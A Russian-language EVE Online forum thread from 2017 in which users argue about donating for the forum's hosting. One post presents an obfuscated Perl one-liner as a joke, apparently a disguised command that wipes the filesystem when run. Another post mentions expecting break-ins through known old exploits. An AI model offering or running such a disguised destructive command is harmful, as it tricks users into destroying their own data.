Перейти к содержимому

Донат
На хостинг
ISK за переводы
до 75kk за 1000зн.
Хроники EVE
Сборник
Новичкам
Полезная информация
Фотография

Донат (собираем на хостинг)

donate хостинг спам

1003 ответов в теме

nikitas

nikitas

Fuck The System

• Tech III Pilots
  • PipPipPipPipPip
  • 3737 сообщений
54
  • EVE Ingame:nikitasius
  • EVE Alt:lacoquine
  • Corp:Russian Group
  • Ally:EVIL
  • Channel:SFLD-PUB
  • Client:Eng

Тише же ты, божечки! Еси это случитца скажут, что это был русские хакер я.

Я уверен, сейчас многие будут гуглить, в итоге найдут

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Или вот такой вот универсальный:

Спойлер

• 0

٩(̾●̮̮̃•̃̾)۶ [☠] [☠] [☠] [☠] [ ? ] ٩(̾●̮̮̃•̃̾)۶

makstomaks

makstomaks

Clone Grade Omicron

• Tech III Pilots
  • PipPipPipPipPipPipPipPipPipPip
  • 47019 сообщений
9747
  • EVE Ingame:Osmon Queen

Эвентмейкинг 101 бай ап?

Если.

А если собирать кучу лишнего бабла просто чтоб у никитаса форум запускался с его паранойей, то если и не будет.

• 0

Felin

Felin

Clone Grade Kappa

• Tech III Pilots
  • PipPipPipPipPip
  • 2441 сообщений
168
  • EVE Ingame:Darth Felin
  • Corp:MAS-B

Вытекает, что никто не должен донатить на то, что не развивается, стоит на месте вяло болтается и служит фаном лишь нескольким модерам и тролям. Пусть те самые люди (пингвин, рыба и кто еще ошивается тут и троллит) донатят. Незачем делать публичное обращение.

Мммм... конечно не должен, это дело исключительно добровольное. Или над тобой кто-то с паяльником стоит и заставляет?
  • 0

Donoviz

Donoviz

Clone Grade Ksi

• Tech III Pilots
  • PipPipPipPipPipPipPipPipPip
  • 13774 сообщений
2233
  • Client:Рус

Цель - собрать около $1000 для оплаты года хостинга, после чего кнопка будет отключена до следующего раза.

А вобще советую оставить кнопку насовсем. Донат сейчас это не что-то такое постыдное, как раньше было. Сейчас все донатят, на стримах и т.д. Вобщем донат сегодня - это модно.

Пару лет назад, например в танках, считалось, что постить свой кошелек во время стрима - фу попрошайка, дизлайк и атписка. А сейчас только ленивый не стримит с номерами кошельков, донатилок и т.д.

Сообщение отредактировал Donoviz: 17 August 2017 - 15:42

• 1

unti1x

unti1x

Chaotic neutral

• Tech III Pilots
  • PipPipPipPipPipPipPipPip
  • 8535 сообщений
1949
  • EVE Ingame:Chio Olgidar
  • Corp:-CDP-
  • Channel:Crevetize

Ну, а на счет правки - я как-то переносит сраный и древний сайт с 5.1... на 5.6. Все заработало, кроме "длины ключей для шифрования" или както так. Там для сессий если ранее размер ключа был любой, то теперь там фиксированные. Поправил 2 строчки в коде и все заработало. А я не php кодер.

Поверь, изменений гораздо больше: начиная от удаления части устаревших функций из самого php, до остановки pecl-расширений и полного изменения их api без поддержки старых версий на новых сборках. Ну, и поддержка 5.6 - это не на долго, потому что с выходом 7.2 она закончится, а он уже не за горами (не так давно вышла бета).

• 0

Аффтар, зохавай исчо тех аццких олбанских креведок, да выпей йаду.

nikitas

nikitas

Fuck The System

• Tech III Pilots
  • PipPipPipPipPip
  • 3737 сообщений
54

Можно еще десять лет просидеть без твоего хпптс, если тут будут эвентмейкеры. А можно просидеть с десятикратным шифрованием, но без них.

Ты выбрал второе, результат все видели.

Будет время - займусь по новой.

Когда занимался - даже сделал механизм РО, по аналогии с IPB, которого не было на phpbb (через систему предупреждений).

Добавил статистику, чтобы видели, кто в бане или в РО (выбор столбцов сейвится в локальном хранилище браузера, надо чистить ручками, так как домен не прописан в демке).

По этому форуму я одно время рылся в старом мусоре: сайтик с со старыми комментами, статистика, реповойны.

А вот ты, кроме вайна и я мухожук, я вернулся ничего толком и не сделал :trololo:

Нужно делать фановые вещи себе в кайф и на пользу другим.

Если.

А если собирать кучу лишнего бабла просто чтоб у никитаса форум запускался с его паранойей, то если и не будет.

Лол, мне иврушка не нужна. Я зашел, проверил что и как и вышел. Пусть глянут историю моих коннектов (у меня статический айпи, тор не юзаю).

Сейчас я жду череду взломов, так как по дырках 5 летней давности давно есть эскплоиты. Мне будет интересно посмотреть, чем закончится это дело. Мне лично (персонально) ломать форум смысла нет.. ну может кроме как доступа к личной переписки всех и вся. Но у меня сейчас куча работы к завершению, продажа биткоинов на горизонте и отпуск на Мальдивы в идеале.

• 0

MegaDocent

MegaDocent

Clone Grade Omega

• EVE-RU Team
  • 10044 сообщений
2463
  • EVE Ingame:Mega D0cent
  • EVE Alt:Mega Docent

Закинул 4 обеда на рыбок.

• 0

fxea

fxea

Damage control

• Faction pilots
  • PipPipPipPipPip
  • 2877 сообщений
755
  • EVE Ingame:^^
  • EVE Alt:Xeata
  • Corp:-D.G-
  • Ally:WarDogs
  • Channel:X-Tea

Будет забавно, если через пару недель Ап выложит краткий отчет, из которого станет ясно, что за все время собрано 53 рубля 71 копейка и ники конкретных жертвователей. А то если верить репликам - там уже чуть ли не на бентли накидали.

Да, будет смешно, когда потом пользователи заскринят переводы, а ап покажет фотку лансера и трололофейс.
Будет забавно читать скептиков если появится отчет где все ровно, а пророки египта за 53 рубля соснут.

Кому жабно очень могут скипнуть топик, ап в зеленой зоне пусть едет в египет.. но вот если после сборов ив-ру.ком пойдет ко дну будет обидно.

Если вариант Крекера реальный, то чел может педалить что угодно, просто потому что у него есть предложение альтернативы..

Фишка просто так еще никого не чемоданил, к чему бы..

• 0

Сущности, игнор которых делает форум лучше: massdriver , Jerome Higs , КотМэн , anknown , Smoketriada , Likon , Corpse
<url=fitting:17843:2048;1:33896;3:1335;23:2488;5:2185;5:2446;5::>VNI ULTIMATE HULL TANK</url>
"Еще неизвестно запасы чего исчерпаются в этой игре раньше. Минералов или... игроков." © Art1st

darkpan

darkpan

Shri Rudra Dhyanam

• Tech III Pilots
  • 9143 сообщений
2693
  • EVE Ingame:darkpan

Донатед

Кстати, было бы неплохо прикрутить какую нить плашку стречгола. Типа собрано всего столько то, осталось столько то. Просто для интереса и статистики

• 0

Donoviz

Donoviz

Clone Grade Ksi

• Tech III Pilots
  • 13774 сообщений
2233

ага... донатер недели и т.д.

• 0

MegaDocent

MegaDocent

Clone Grade Omega

• EVE-RU Team
  • 10044 сообщений
2463
  • EVE Ingame:Mega D0cent
  • EVE Alt:Mega Docent

Плашку нам не прикрутят, как я понимаю. Но для интереса и статистики запилил опросник.

p.s. Адрес кошелька в первопосте на свой я не менял. :trololo:

• 2

Lehadyd

Lehadyd

РМТ-барон повержен...

• Tech III Pilots
  • 8317 сообщений
4206
  • EVE Ingame:Gas Grease
  • EVE Alt:Lehadyd
  • Corp:ищу

Мужики, этому форуму хренова гора лет и он все это время не святым духом питался. За столько лет Ап показал себя человеком, которому можно доверять вэтом деле, и раз уж несколько месяцев назад дело дошло до рокетбанка, то значит человеку действительно стало внапряг этот форум содержать. Если бы он хотел греть ручки на форуме, он бы это стал делать давныммммм давноооооо...но он оттягивал этот момент десяток лет и уже за одно это ему можно и нужно сказать спасибо.

Да пусть хоть 10к баксов соберет, любая работа должна быть оплачена. Будет возможность, я еще скину.

ап, скажи кто твой чумаданер, и я скажу кто ты.

То что главный рмт-шер последних лет так яро защищает и изящно орудует язычком, вызывает ряд вопросов.

Но это все лирика.

Бабло начали собирать, а штаны с лилу и прочих клэнси не сняли.

Почему?

• 3

Wyreth

Wyreth

Для приведения в соответствие ..

• Tech III Pilots
  • 10325 сообщений
1771
  • EVE Ingame:Wyreth

Цель - собрать около $1000 для оплаты года хостинга, после чего кнопка будет отключена до следующего раза.

Вопрос уважаемым. Я правильно понял, что денюшка падает на ЯД, счёт 41001698609523 ?

Просто, в силу некоторых обстоятельств, сейчас смогу засунуть только через терминал оплаты.

Прокатит ? Или возможны какие нюансы ?

• 0

Donoviz

Donoviz

Clone Grade Ksi

• Tech III Pilots
  • 13774 сообщений
2233

ап, скажи кто твой чумаданер, и я скажу кто ты.

То что главный рмт-шер последних лет так яро защищает и изящно орудует язычком, вызывает ряд вопросов.

Но это все лирика.

Бабло начали собирать, а штаны с лилу и прочих клэнси не сняли.

Почему?

потому что утром деньги - вечером стулья

• 0

Alexfishka

Alexfishka

Император 5 регионов

• Faction pilots
  • 24452 сообщений
6243
  • EVE Ingame:Alexfishka
  • EVE Alt:Не скажу...много их.
  • Corp:Airguard
  • Ally:-LSH-
  • Channel:ЛСШ ПАБ

Будет забавно читать скептиков если появится отчет где все ровно, а пророки египта за 53 рубля соснут.

Кому жабно очень могут скипнуть топик, ап в зеленой зоне пусть едет в египет.. но вот если после сборов ив-ру.ком пойдет ко дну будет обидно.

Если вариант Крекера реальный, то чел может педалить что угодно, просто потому что у него есть предложение альтернативы..

Фишка просто так еще никого не чемоданил, к чему бы..

Крекер ненавидит игру и форум, ну и как следствие всех тех кто поддерживает интерес к форуму и игре...зачем отдавать в руки этому клоуну форум?

Если вы считаете что я тут кого то чумаданю, то вы либо больные люди, либо у вас персональная боль на меня :D

• 0
Вызываю попоболь и батхерд по следующим темам:
1) Титан и портал. 2) Бонусники в гриде. 3) 100АБ тенга.
А так я обычная "лоусечная шалупень" и фармер 5 лвл.

unti1x

unti1x

Chaotic neutral

• Tech III Pilots
  • 8535 сообщений
1949
  • EVE Ingame:Chio Olgidar
  • Corp:-CDP-
  • Channel:Crevetize

Крекер ненавидит игру и форум, ну и как следствие всех тех кто поддерживает интерес к форуму и игре...зачем отдавать в руки этому клоуну форум?

Если вы считаете что я тут кого то чумаданю, то вы либо больные люди, либо у вас персональная боль на меня :D

у Крекера просто недостаток внимания и обнимашек, вот он и вредничает

Спойлер

• 0

Аффтар, зохавай исчо тех аццких олбанских креведок, да выпей йаду.

MadRookie

MadRookie

Clone Grade Alpha

• Tech II Pilots
  • Pip
  • 31 сообщений
1
  • EVE Ingame:Loranna White
  • Channel:L-Intel

Скорей уж никитас ибо могёт в это вот всё.

Так там одмин хостенка порнуху терабайтами качает, чо уж там.

Порнуху терабайтами?

Спойлер

З. Ы. Там вовсю говорят про то что эта акция по сбору средств - рмт. Сколько донатить на навивексор?

Спойлер

• 0

nikitas

nikitas

Fuck The System

• Tech III Pilots
  • PipPipPipPipPip
  • 3737 сообщений
54

Порнуху терабайтами?

Порнуха уже не та, что была раньше.

• 0

Kpekep*Нейтрал

Kpekep*Нейтрал
  • Guests

Отличный скотский опросник запилил доцент. Прям в его стиле

Я переведу на русский кто не понял -

Принципиально не стану донатить в это болото (манипуляция, любой кто не считает это болотом автоматом уже как бы должен донатить )
Я мимокрокодил (примерно то же что и п.1 )
Нету денег, но я поддерживаю (смешно читать - если есть деньги и поддерживашеь то даешь, если нет денег то в чем поддержка ? )
Задонатил до 499р - (тут все ровно)
Задонатил до 999р - (тут все ровно)
Задонатил до 1999р- (тут все ровно)
Я не нищеброд и могу позволить себе эти мелкие траты (2к+) (оскорбление группы пользщователей и намек на то что все кто задонатил менее 2к просто нищеброды недостойные)

С дуба что ли рухнул ? Должны же быть какие то края у чемоданинга. Вы тут вовсе рехнулись  - визг фишки доносящиийся сквозь цитаты до меня заглушает раскаты перфоратора  в соседней квартире.

Опросник должен быть вида

Не одобряю донат.

Одобряю донат.

Задонатил.

Задоначу если будет предварительная отчетность.

Все. Че с вами тут ? Какая сука разница сколько кто задонатил ?

Вы тут с фишкой истерите так как будто вам процент светится - омерзительно просто.

Сообщение отредактировал Kpekep: 17 August 2017 - 16:55

• 0

Alexfishka

Alexfishka

Император 5 регионов

• Faction pilots
  • 24452 сообщений
6243
  • EVE Ingame:Alexfishka
  • EVE Alt:Не скажу...много их.
  • Corp:Airguard
  • Ally:-LSH-
  • Channel:ЛСШ ПАБ

Ну вот крекер слился за мат :laugh:

• 0
Вызываю попоболь и батхерд по следующим темам:
1) Титан и портал. 2) Бонусники в гриде. 3) 100АБ тенга.
А так я обычная "лоусечная шалупень" и фармер 5 лвл.

0 посетителей читают тему

0 members, 0 guests, 0 anonymous users